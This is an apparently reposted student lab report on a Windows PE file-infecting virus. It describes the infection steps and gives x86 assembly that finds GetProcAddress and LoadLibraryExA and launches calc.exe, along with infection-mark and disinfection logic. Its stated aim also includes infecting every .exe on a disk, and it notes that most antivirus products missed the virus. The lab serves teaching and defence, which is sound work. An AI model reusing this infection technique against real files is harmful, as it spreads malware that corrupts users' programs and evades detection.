PE File Virus Experiment (2): Experiment Report

Experiment purpose: master the PE file format and understand how viruses infect PE files.
Experiment content:
(1) Understand the PE file format.
(2) Following the experimental procedure, write a program that inserts virus code into a PE file, then run the PE file after the virus code has been inserted.
(3) Write a program that searches the disk for .exe files, inserts the virus code into every .exe file found, and runs each file after insertion.
(4) Write a program that searches the disk for the .exe files infected in (3), removes the virus code from each of them, and runs each file after removal.

Project address:

https://github.com/jmhIcoding/PE-learning.git

1. Experimental principle:

Win32 executable files, such as *.exe, *.dll, and *.ocx, are all in PE format. A Win32 virus that infects PE files is called a PE virus for short. Among all viruses, PE viruses are the most numerous, the most destructive, and the most technically sophisticated. To develop better anti-virus technology, it is essential to understand how such viruses work. A PE virus generally needs several capabilities: relocation, obtaining API function addresses, searching for target files to infect, memory-mapped file access, and carrying out the infection. These are the basic problems that any such virus must solve.

The basic steps by which a PE virus infects a file are as follows:
(1) Check whether the first two bytes of the target file are "MZ".
(2) Check for the PE file signature "PE".
(3) Check the infection mark. If the file is already infected, skip it and continue executing the HOST program; otherwise continue.
(4) Get the number of data directories (Directory entries); each data directory entry occupies 8 bytes.
(5) Get the starting position of the section table: offset of the data directory + number of bytes occupied by the data directory = starting position of the section table.
(6) Traverse the section table and find the first section whose free space can hold the entire virus code.
The free space of each section is calculated as: free space of the i-th section = virtual address of the (i+1)-th section - virtual address of the i-th section - Misc.VirtualSize of the i-th section.
(7) Start writing the target code:

  1. Calculate the file offset of the target code; the target code is later written into the PE file starting at this position. It is calculated as: Misc.VirtualSize of the target section + PointerToRawData of the target section.
  2. Change the section attribute (Characteristics) of the target section to 0xE00000E0. The high bits 0xE0000000 mark the section as executable, readable, and writable; the low byte 0xE0 marks it as containing code, initialized data, and uninitialized data.
  3. Write the data area of the target code.
  4. Write the executable body of the target code.
  5. Modify AddressOfEntryPoint so that the program entry point refers to the virus entry location, and save the old AddressOfEntryPoint so that control can return to the HOST and execution can continue.
  6. Update SizeOfImage (the size of the whole PE image in memory): new SizeOfImage = original SizeOfImage + size of the virus code after alignment to the in-memory section alignment. Likewise, new SizeOfCode = original SizeOfCode + size of the virus code after memory alignment.
  7. Write the infection mark, and write the old AddressOfEntryPoint after the infection mark to help with disinfection.
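
The header checks in steps (1) and (2), the section-table lookup in step (5), and the free-space formula in step (6) can be tried out with a small read-only inspection script. This is a minimal sketch, not the project's code: the function name `section_slack` is hypothetical, and it locates the section table through `SizeOfOptionalHeader`, which for a standard header gives the same position as the data-directory calculation in step (5). The last section is skipped because the formula needs a following section.

```python
import struct

def section_slack(data: bytes):
    """Return [(section name, free bytes)] for every section except the last."""
    # Steps (1)-(2): check the "MZ" and "PE\0\0" signatures.
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]        # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    # IMAGE_FILE_HEADER follows the 4-byte signature.
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]

    # Step (5): the section table starts right after the optional header.
    table = pe_off + 24 + opt_size

    sections = []
    for i in range(num_sections):
        # Each 40-byte entry starts with Name[8], VirtualSize, VirtualAddress.
        name, vsize, vaddr = struct.unpack_from("<8sII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize))

    # Step (6): free_i = VirtualAddress_{i+1} - VirtualAddress_i - VirtualSize_i
    return [(name, nxt[1] - vaddr - vsize)
            for (name, vaddr, vsize), nxt in zip(sections, sections[1:])]
```

Calling `section_slack(open(path, "rb").read())` on a file lists how many unused bytes each section has before the next one begins, which is the quantity step (6) compares against the size of the code to be inserted.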

2. Laboratory equipment (equipment, components)

(1) Each student has a PC with Windows operating system installed.

3. Experimental steps:

PE file virus
1. Write a simple program that prints "hello world!", and compile it to obtain hello.exe.
2. Write simple virus code that starts the system's calculator program.
3. Write a program that inserts the virus code into hello.exe, then run hello.exe with the code inserted.
4. Run the disinfection code on the newly infected hello.exe so that the virus code can no longer execute.

4. Experimental data and result analysis:

1. Write the host program hello.exe:

#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("Hello world!..\n");
    system("pause");
    return 0;
}

Running result:

[Figure: output of hello.exe]

2. Write virus code

The basic idea of the virus code is:

A. First, dynamically obtain the base address of KernalBase32.dll through the TEB.
B. Then search the address space of KernalBase32 for the address of the GetProcAddress() function.
The function prototype of the GetProcAddress() function is:

FARPROC GetProcAddress(
HMODULE hModule, // handle of the DLL module
LPCSTR lpProcName // function name
);

Through this function, you can get the address of a specified function in a DLL.
We use it to get the addresses of the LoadLibraryExA function and the system() function.
The function prototype of LoadLibraryExA is:

HMODULE WINAPI LoadLibraryEx(
  _In_       LPCTSTR lpFileName, // file name of the DLL, e.g. "msvcr120.dll"
  _Reserved_ HANDLE  hFile,      // reserved, set to 0
  _In_       DWORD   dwFlags     // flags, set to 0x10 (LOAD_IGNORE_CODE_AUTHZ_LEVEL) here
);

The LoadLibraryExA function loads a DLL file. In this experiment it is used to load msvcr120.dll, which contains system(). We then start the calculator program with a call equivalent to system("calc.exe").
C. Because the virus code needs data to work with, a data area is placed before the code.

The layout of the virus code is:

The data area occupies 92 bytes in total (the fields below sum to 92, matching the offsets -92 to -4 used in the code) and includes:

oldEntry: the old AddressOfEntryPoint, i.e. the program entry (4 bytes)
Baseofmsvcr120: base address of the target DLL (4 bytes)
AddOfFunction: address of the target function (system) (4 bytes); this function will be executed.
addOfcurrent: virtual address of the virus code, used for relocation (4 bytes)
dllname: file name of the target DLL to load (16 bytes), i.e. "msvcr120.dll"
functionname: function to execute in the target DLL (16 bytes), i.e. "system"
info: argument of the functionname function (16 bytes), i.e. "calc.exe"
loadLibrarayEx: the string "LoadLibraryExA" (16 bytes)
pLoadLibraryExa: address of the LoadLibraryExA function (4 bytes)
kernalBase: base address of KernalBase (4 bytes)
getProcAddr: address of the GetProcAddress function (4 bytes)

They are defined as:

//virus code block
			//data area
			DWORD oldEntry = fileh.OptionalHeader.AddressOfEntryPoint;//-92
			DWORD baseOfmsvcr120 = 0;//-88
			DWORD addOfprintf = 0;//-84
			DWORD addOfcurrent = 0;//-80
			char dllname[16] = "msvcr120.dll";//-76
			char functionname[16] = "system";//-60
			char info[16] = "calc.exe";//-44
			char loadlibraryEx[16] = "LoadLibraryExA";//-28
			DWORD pLoadLibraryExA = 0;//-12
			DWORD kernelBase = 0;//-8
			DWORD getProcAddr = 0;//-4
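
The negative numbers in the comments above are offsets measured back from the end of the data area. As a quick sanity check, the sketch below recomputes them from the field sizes. It assumes the fields are stored back to back with no padding, which is what the commented offsets imply; the names `FIELDS` and `offsets_from_end` are hypothetical.

```python
# (name, size in bytes), in the order the fields are declared above
FIELDS = [
    ("oldEntry", 4), ("baseOfmsvcr120", 4), ("addOfprintf", 4), ("addOfcurrent", 4),
    ("dllname", 16), ("functionname", 16), ("info", 16), ("loadlibraryEx", 16),
    ("pLoadLibraryExA", 4), ("kernelBase", 4), ("getProcAddr", 4),
]

def offsets_from_end(fields):
    """Map each field name to its negative offset from the end of the data area."""
    total = sum(size for _, size in fields)
    result, pos = {}, 0
    for name, size in fields:
        result[name] = pos - total   # distance back from the end of the area
        pos += size
    return result

OFFSETS = offsets_from_end(FIELDS)
TOTAL_SIZE = sum(size for _, size in FIELDS)

for name, offset in OFFSETS.items():
    print(f"{name:16s} {offset}")
```

Under that assumption the total comes to 92 bytes, and each computed offset agrees with the value written in the corresponding comment.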

Design of the code execution area:

The code first needs to relocate itself, which is done with:

				call A
				A :
				pop edi
				//there may be some offset
				sub edi,5
				mov [edi-80], edi;//assign current address.

This saves the current memory address in edi. The call instruction pushes the address of label A, and pop edi retrieves it. Because the call instruction occupies 5 bytes, subtracting 5 from edi gives the address of the call itself, which is the start of the code and therefore the end of the data area (just past getProcAddr). The value is then stored at [edi-80], the memory unit of addOfcurrent in the data area.

Then get the base address of KernalBase32:

mov eax, fs:[30h]
			mov eax, [eax + 0ch]
			mov eax, [eax + 1ch]
			mov eax, [eax]
				mov eax, [eax + 8h]
			mov [edi-8], eax;

This relies mainly on the PEB and TEB structures. The method correctly obtains the KernalBase32 base address on Windows 10, Windows 7, and XP.

Then search for the address of the GetProcAddress function.

				mov edi, eax
					mov eax, [edi + 3Ch]
					mov edx, [edi + eax + 78h]
					add edx, edi; edx = address of the export table
					mov ecx, [edx + 18h]; ecx = number of exported names (NumberOfNames)
					mov ebx, [edx + 20h]
					add ebx, edi; ebx = address of the function name array, AddressOfNames

				search :
				dec ecx
					mov esi, [ebx + ecx * 4]
					add esi, edi; check each function name in turn
					; GetProcAddress
					mov eax, 0x50746547
					cmp[esi], eax; 'PteG'
					jne search
					mov eax, 0x41636f72
					cmp[esi + 4], eax; 'Acor'
					jne search
					; a match on "GetProcA" means the function has been found
					mov ebx, [edx + 24h]
					add ebx, edi; ebx = address of the ordinal array, AddressOfNameOrdinals
					mov cx, [ebx + ecx * 2]; ecx = the ordinal value
					mov ebx, [edx + 1Ch]
					add ebx, edi; ebx = start of the function address array, AddressOfFunctions
					mov eax, [ebx + ecx * 4]
					add eax, edi; use the ordinal to obtain the address of GetProcAddress
					sub eax, 0xb0
					pop edi
					mov ebx, edi;
					mov [ebx-4], eax;//address of GetProcAddress

This code searches the export name table for the name "GetProcAddress". The index of the matching name is then used to look up the function's address according to the structure of the export table (name index, then ordinal, then function address), and the result is saved in getProcAddr in the data area.
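
The export table stores three parallel arrays, and the lookup chains through them: the position of a name in AddressOfNames selects an entry in AddressOfNameOrdinals, and that value indexes AddressOfFunctions. The sketch below illustrates only this indexing with plain Python lists. The function name `resolve_export` is hypothetical, and the sample names, ordinals, and RVAs are made up for illustration rather than taken from a real DLL.

```python
def resolve_export(name, names, name_ordinals, functions):
    """Return the RVA exported under `name`, or None if the name is absent."""
    for i, candidate in enumerate(names):
        if candidate == name:
            ordinal_index = name_ordinals[i]   # AddressOfNameOrdinals[i]
            return functions[ordinal_index]    # AddressOfFunctions[ordinal_index]
    return None

# Hypothetical export data, for illustration only.
names = ["CloseHandle", "GetProcAddress", "LoadLibraryExA"]
name_ordinals = [2, 0, 1]
functions = [0x1A2B0, 0x2C3D0, 0x0F100]

rva = resolve_export("GetProcAddress", names, name_ordinals, functions)
print(hex(rva))
```

The value found this way is an RVA, so the module base address still has to be added to obtain the function's address in memory.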

Then get the address of LoadLibraryExA through GetProcAddress:

				sub ebx,28
				push ebx
				add ebx,28
				push [ebx-8];
				call [ebx-4];
			mov [ebx-12], eax;//address of LoadLibraryExA

Then load the dynamic-link library msvcr120.dll through LoadLibraryExA:

				push 0x00000010
					push 0x00000000
					
					sub ebx,76
					push ebx
					add ebx,76
					//push eax
				call [ebx-12]

					mov [ebx-88], eax;

Here ebx-76 is the address of the string "msvcr120.dll" in the data area. The handle of the loaded library is saved at [ebx-88] (baseOfmsvcr120).

Then get the address of system:

					mov edx, eax
					sub ebx,60
					push ebx
					add ebx,60
					push edx
				call [ebx-4];//get the address of system
					mov [ebx-84], eax;

Call the system function:

sub ebx,44
					push ebx
					add ebx,44
				call eax

Restore the stack:

					add esp, 400h
					pop ecx
					pop esp
					pop ebp
					pop edx

					pop esi
					pop eax
				pop ebx;

Switch back to the original entry point:

					mov eax, fs:[30h]
					mov eax, DWORD PTR [eax+8]
					add eax, [edi-92]
					mov edi,eax
					pop eax
				jmp edi

Note that the original entry address must be computed dynamically. The oldEntry field in the data area stores only the relative offset (RVA) of the old entry point, so it has to be added to the base address of the process image to obtain the virtual address.
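
As a worked example of this calculation, the sketch below adds the same entry-point RVA to two different image base addresses. The function name `rva_to_va` and all numeric values are hypothetical and chosen only for illustration.

```python
def rva_to_va(image_base: int, rva: int) -> int:
    """Virtual address = load address of the image + relative virtual address."""
    return (image_base + rva) & 0xFFFFFFFF   # stay within a 32-bit address space

# Hypothetical values: one entry-point RVA under two different load addresses.
entry_rva = 0x1234
print(hex(rva_to_va(0x00400000, entry_rva)))  # 0x401234
print(hex(rva_to_va(0x00A30000, entry_rva)))  # 0xa31234
```

Because the image can be loaded at a different base from one run to the next, a virtual address stored at infection time would be wrong whenever the base changes, while the stored RVA remains valid.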

3. Write infection code

The infection code checks whether the target file is a PE file and whether it is already infected. If it can be infected, the virus code is inserted into the target PE file.
This experiment uses the 8 bytes following the DOS header as the infection mark. If the first 4 bytes are 0x06060606, the file is already infected, and the last 4 bytes hold the old entry point address used for disinfection.
If the file is not infected, then:
1. Obtain the full section table of the PE file.
2. Search the section table for a section with enough free space to hold the virus code.
3. Write the virus code into that section of the PE file.
4. Update SizeOfImage, SizeOfCode, and the attributes of the modified section.
5. Add the infection mark: set the 4 bytes following the DOS header to 0x06060606 and save the old program entry point right after it.
6. Modify the program entry point of the PE file.
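
The infection mark also gives a scanner a simple way to recognize files touched by this experiment. The sketch below is a minimal detection helper under stated assumptions: the text does not give the exact position of the mark, so the offset 0x40 (the first byte after the 64-byte IMAGE_DOS_HEADER) is a guess and is exposed as a parameter. The names `read_infection_mark` and `MARK_OFFSET` are hypothetical.

```python
import struct

INFECTION_MARK = 0x06060606
MARK_OFFSET = 0x40   # assumption: first byte after the 64-byte IMAGE_DOS_HEADER

def read_infection_mark(data: bytes, offset: int = MARK_OFFSET):
    """Return the saved entry-point RVA if the mark is present, else None."""
    if len(data) < offset + 8 or data[:2] != b"MZ":
        return None
    # 4-byte mark followed by the 4-byte saved AddressOfEntryPoint.
    mark, saved_entry = struct.unpack_from("<II", data, offset)
    return saved_entry if mark == INFECTION_MARK else None
```

A return value of `None` means the mark was not found at that offset; any other value is the saved original entry point that the disinfection step relies on.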

4. Write disinfection code

Disinfection is very simple. Because the real entry point of the host program is saved after the infection mark during infection, we only need to read it back and restore the host program's entry point. The virus code will then no longer be executed.
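
The restore step can be sketched on an in-memory copy of the file. This is an illustrative sketch rather than the project's disinfection program: the function name `restore_entry_point` is hypothetical, and the saved entry point is passed in by the caller, who is assumed to have read it from the infection mark.

```python
import struct

def restore_entry_point(image: bytearray, saved_entry_rva: int) -> int:
    """Write saved_entry_rva back into AddressOfEntryPoint; return the value it replaced."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]       # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # The optional header starts 24 bytes after the signature offset;
    # AddressOfEntryPoint sits 16 bytes into the optional header.
    entry_field = pe_off + 24 + 16
    current = struct.unpack_from("<I", image, entry_field)[0]
    struct.pack_into("<I", image, entry_field, saved_entry_rva)
    return current
```

This only redirects the entry point, as the text describes. The inserted bytes, the changed section attributes, and the infection mark itself stay in the file unless they are cleaned up separately.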

5. Running results

We use hello.exe from step 1 as the host program. Before infection, the program runs as follows:
[Figure: hello.exe running before infection]
We run the virus program to infect the host program. The virus program during infection:
[Figure: virus program infecting the host]
Run the infected host program:
[Figure: infected host program running]
The host program starts the calculator program before printing Hello world, indicating that the infection succeeded.
Inspecting the host program with IDA also shows that the virus code was successfully inserted into the host:
[Figure: IDA screenshot]
[Figure: IDA screenshot]
Then we run the disinfection program to disinfect the host program. The disinfection program at work:
[Figure: disinfection program running]
Run the host program again:
[Figure: host program running after disinfection]
The host program is back to normal and the calculator program is no longer started, so the disinfection succeeded.

5. Experimental conclusions, experience and suggestions for improvement:

In this experiment, by actually writing the virus code, the infection module, and the disinfection module for a PE program, we gained a more thorough grasp of the PE file format. The virus code is inserted into free space by searching the PE file for a section with unused address space. The corresponding header fields are then updated, the section attributes are changed, the entry point is modified, and the infection mark is added. The running results of the infected program show that the virus successfully infected the host program and gained control before the host program ran. After starting the calculator program, control is returned to the host program. The experiment was quite successful.

In addition, I uploaded the virus program to an online virus-scanning website to test whether antivirus software could recognize it. The results are as follows:
[Figure: scan results]
Of the 39 well-known antivirus products tested, only one correctly identified the virus program.
[Figure: scan results]
Kaspersky, Symantec, Rising, and Qihoo 360 all failed to identify it. This shows the limitations of traditional antivirus software when facing a new virus that has not yet spread, even though this is just an ordinary PE virus.

6. Suggestions for improving the experimental process and methods:

The experiment guide suggests adding a new section to the PE file to hold the virus code. In practice this is considerably more work. After inserting a new section, either a new entry must be inserted into the section table, which requires shifting all the sections that follow the section table and is very error-prone; or the last section table entry (usually an unused one) must be repurposed, which avoids shifting the sections, but not every PE file reserves a blank section table entry.

Therefore, this experiment inserts the virus code into the gap within an existing section. This way there is no need to shift any sections, and no need to worry about the alignment of the modified PE file.

Alternatively, the virus code can be appended directly to the end of the last section and merged with the original content of that section to form one larger section. This requires no new section table entry and causes no section-shifting problem.

Origin blog.csdn.net/jmh1996/article/details/104592450